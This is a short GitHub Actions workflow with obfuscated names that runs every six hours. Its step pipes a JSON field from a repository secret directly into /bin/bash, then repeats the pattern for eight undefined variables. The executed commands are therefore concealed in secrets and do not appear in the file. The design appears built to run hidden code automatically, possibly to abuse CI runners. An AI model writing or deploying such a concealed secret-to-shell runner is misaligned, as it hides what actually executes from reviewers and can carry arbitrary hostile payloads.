name: shisuanjian3489

on:
  workflow_dispatch:
  schedule:
    - cron: '44 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: shisuanjian3489
        env:
          rxli954: ${{ secrets.rxli954 }}
        run: |
          echo $rxli954 | jq -r .ezqfv6843 | /bin/bash
          echo $sl2753 | jq -r .tp380 | /bin/bash
          echo $f0127 | jq -r .kp30 | /bin/bash
          echo $pl5 | jq -r .ul64 | /bin/bash
          echo $gs6 | jq -r .dz84 | /bin/bash
          echo $hn59484 | jq -r .l48060 | /bin/bash
          echo $d07 | jq -r .sggv091 | /bin/bash
          echo $hs82 | jq -r .cebva12 | /bin/bash
          echo $woq13247 | jq -r .rehri0169 | /bin/bash

